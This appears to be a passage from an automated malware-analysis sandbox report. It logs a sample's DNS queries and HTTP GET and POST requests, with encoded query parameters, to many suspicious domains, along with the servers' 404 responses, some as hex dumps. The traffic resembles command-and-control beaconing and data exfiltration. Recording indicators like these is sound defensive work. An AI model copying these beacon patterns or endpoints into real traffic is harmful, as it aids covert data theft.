        Source: global trafficHTTP traffic detected: GET /enra/?ij60MtY=EuJScojaXV9tkcwMAt8AIq1Fa6SjC3UOd2jPPlI8uN15nuMsourZ6RQE0C5sWIKd2oJ0ti0mlaCO+WC8VNvzQxVxe8Bdx85A43xT3KZq/wlYnQ9EpMMmNcQ=&wXB=brv4Erb HTTP/1.1Host: www.foundation-repair.bizAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
        Source: global trafficHTTP traffic detected: GET /c0kl/?wXB=brv4Erb&ij60MtY=AxZR1MxN1yP04/KkfJjqNmRSK4d8g2rgChYpgYbN8LwS/ds0321h0MeEKpKCay63h/JFzZR/nOfV69IulQUTnqrvqwrwGbRyvD357dhiEinhnUxdss5AyLg= HTTP/1.1Host: www.emeluzunmoda.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
        Source: global trafficHTTP traffic detected: GET /mktg/?ij60MtY=0TalvP/u8kBxCEcVC8ZYLDfWzg1d8ZMLdJUcZNeUjcCfUnJGBGp8dbleblgtUVXijVAfatBw5nkrSCpMHneIWtcqoMWdglrJlT3qBoY6Uu70toyjn3om774=&wXB=brv4Erb HTTP/1.1Host: www.ayypromo.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
        Source: global trafficHTTP traffic detected: GET /gir9/?ij60MtY=f5fgxEQYyH9aCEvnqRNhj/uGI07axwFwhdkCg+bZ+BEtnM1/7SlBYCrjg9utQFPLrd0Y68zwkqIMf6pHdwjKMQmtDey6vcSJt3zCtqxSD+6F6gKu0jTr2I8=&wXB=brv4Erb HTTP/1.1Host: www.magicface.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
        Source: global trafficHTTP traffic detected: GET /ns8q/?ij60MtY=Inf42ZVLRw6HwISCOPUKL9E43+GpX4bkPpg82teOxrbDSww0PzIRQy8gHWXiaO2t1uZOdy10GUfR4hRxDB6Ts5zJpETBxtnbe//OQKeepMDnU8nxUbj7e0s=&tvodg=2Zld-RLxEfN HTTP/1.1Host: www.home-check.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
        Source: global trafficDNS traffic detected: DNS query: www.groupriam.com
        Source: global trafficDNS traffic detected: DNS query: www.foundation-repair.biz
        Source: global trafficDNS traffic detected: DNS query: www.asa-malukuutara.com
        Source: global trafficDNS traffic detected: DNS query: www.sedezne-blazine.shop
        Source: global trafficDNS traffic detected: DNS query: www.meetfactory.biz
        Source: global trafficDNS traffic detected: DNS query: www.518729.xyz
        Source: global trafficDNS traffic detected: DNS query: www.cachsoicautdtc.best
        Source: global trafficDNS traffic detected: DNS query: www.itemfilterhub.shop
        Source: global trafficDNS traffic detected: DNS query: www.bullbord.top
        Source: global trafficDNS traffic detected: DNS query: www.cannulafactory.top
        Source: global trafficDNS traffic detected: DNS query: www.7ddw.top
        Source: global trafficDNS traffic detected: DNS query: www.home-check.shop
        Source: global trafficDNS traffic detected: DNS query: www.emeluzunmoda.online
        Source: global trafficDNS traffic detected: DNS query: www.ayypromo.shop
        Source: global trafficDNS traffic detected: DNS query: www.magicface.shop
        Source: global trafficDNS traffic detected: DNS query: www.hypepgbet.online
        Source: global trafficDNS traffic detected: DNS query: www.multfiber.net
        Source: unknownHTTP traffic detected: POST /21hf/ HTTP/1.1Host: www.asa-malukuutara.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-usOrigin: http://www.asa-malukuutara.comCache-Control: no-cacheConnection: closeContent-Length: 204Content-Type: application/x-www-form-urlencodedReferer: http://www.asa-malukuutara.com/21hf/User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 27 Aug 2024 05:58:24 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://asa-malukuutara.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: brContent-Length: 12523Content-Type: text/html; charset=UTF-8
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 27 Aug 2024 05:58:27 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://asa-malukuutara.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: brContent-Length: 12523Content-Type: text/html; charset=UTF-8
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 27 Aug 2024 05:58:30 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://asa-malukuutara.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: brContent-Length: 12523Content-Type: text/html; charset=UTF-8
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 27 Aug 2024 05:59:41 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/html
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 27 Aug 2024 05:59:44 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 
22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 27 Aug 2024 05:59:47 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 
22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 27 Aug 2024 05:59:49 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 
69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Tue, 27 Aug 2024 05:59:55 GMT Content-Type: text/html Content-Length: 3971 Connection: close ETag: "6526681e-f83"
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Tue, 27 Aug 2024 05:59:58 GMT Content-Type: text/html Content-Length: 3971 Connection: close ETag: "6526681e-f83"
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Tue, 27 Aug 2024 06:00:01 GMT Content-Type: text/html Content-Length: 3971 Connection: close ETag: "6526681e-f83"
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Tue, 27 Aug 2024 06:00:04 GMT Content-Type: text/html Content-Length: 3971 Connection: close ETag: "6526681e-f83"
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Tue, 27 Aug 2024 06:00:10 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "66a62378-94" Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Tue, 27 Aug 2024 06:00:12 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "66a62378-94" Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Tue, 27 Aug 2024 06:00:15 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "66a62378-94" Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Tue, 27 Aug 2024 06:00:18 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "66a62378-94" Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Tue, 27 Aug 2024 06:00:24 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: gzip
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Tue, 27 Aug 2024 06:00:27 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: gzip
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Tue, 27 Aug 2024 06:00:30 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: gzip
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Tue, 27 Aug 2024 06:00:32 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Data Ascii: 46<h1>Related Page not found</h1><p>Sorry, we cannot find that page.</p>0
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.14.1 Date: Tue, 27 Aug 2024 06:00:51 GMT Content-Length: 0 Connection: close X-Rate-Limit-Limit: 5s X-Rate-Limit-Remaining: 19 X-Rate-Limit-Reset: 2024-08-27T06:00:56.7231680Z
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.14.1 Date: Tue, 27 Aug 2024 06:00:54 GMT Content-Length: 0 Connection: close X-Rate-Limit-Limit: 5s X-Rate-Limit-Remaining: 18 X-Rate-Limit-Reset: 2024-08-27T06:00:56.7231680Z
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.14.1 Date: Tue, 27 Aug 2024 06:00:57 GMT Content-Length: 0 Connection: close X-Rate-Limit-Limit: 5s X-Rate-Limit-Remaining: 19 X-Rate-Limit-Reset: 2024-08-27T06:01:02.6986999Z
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.14.1 Date: Tue, 27 Aug 2024 06:01:00 GMT Content-Length: 0 Connection: close X-Rate-Limit-Limit: 5s X-Rate-Limit-Remaining: 19 X-Rate-Limit-Reset: 2024-08-27T06:01:05.0052375Z
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: ddos-guardConnection: closeSet-Cookie: __ddg1_=265J2Y2ZbcJAwSS7AN9S; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Wed, 27-Aug-2025 06:01:05 GMTDate: Tue, 27 Aug 2024 06:01:05 GMTContent-Type: text/html; charset=UTF-8Content-Length: 340Last-Modified: Tue, 29 May 2018 17:41:27 GMTETag: "154-56d5bbe607fc0"Accept-Ranges: bytesX-Frame-Options: SAMEORIGINData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: ddos-guardConnection: closeSet-Cookie: __ddg1_=zeOHFGGvHLrata6NIjUS; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Wed, 27-Aug-2025 06:01:08 GMTDate: Tue, 27 Aug 2024 06:01:08 GMTContent-Type: text/html; charset=UTF-8Content-Length: 340Last-Modified: Tue, 29 May 2018 17:41:27 GMTETag: "154-56d5bbe607fc0"Accept-Ranges: bytesX-Frame-Options: SAMEORIGINData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>
